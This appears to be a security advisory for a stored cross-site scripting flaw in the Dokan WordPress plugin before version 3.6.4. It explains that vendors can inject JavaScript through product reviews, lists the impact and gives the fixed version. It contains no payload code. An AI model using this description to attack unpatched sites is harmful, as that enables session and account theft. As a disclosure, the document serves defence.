Dokan < 3.6.4 - Vendor Stored Cross-Site Scripting

Vulnerability

The Dokan WordPress plugin, versions before 3.6.4, fails to properly sanitize product reviews submitted by vendors. This allows vendors to inject arbitrary JavaScript into review content, leading to a stored cross-site scripting (XSS) vulnerability. The affected code path is triggered when a vendor submits a review via the plugin's frontend or backend interface. [1]

Exploitation

An attacker must have a vendor account on the WordPress site (authenticated with the vendor role). The attacker submits a product review containing malicious JavaScript. When other users, including site administrators, view the product page or the review, the injected script executes in their browser. No additional user interaction beyond viewing the review is required. [1]

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser. This can lead to session hijacking, theft of cookies, defacement, or administrative account takeover, depending on the victim's privileges. The attacker gains the ability to perform actions as the victim, potentially compromising the entire WordPress site. [1]

Mitigation

The vulnerability is fixed in version 3.6.4 of the Dokan plugin. Users should update to this version or later immediately. No workarounds are documented. The plugin is actively maintained, and the fix was released on 2022-09-13. [1]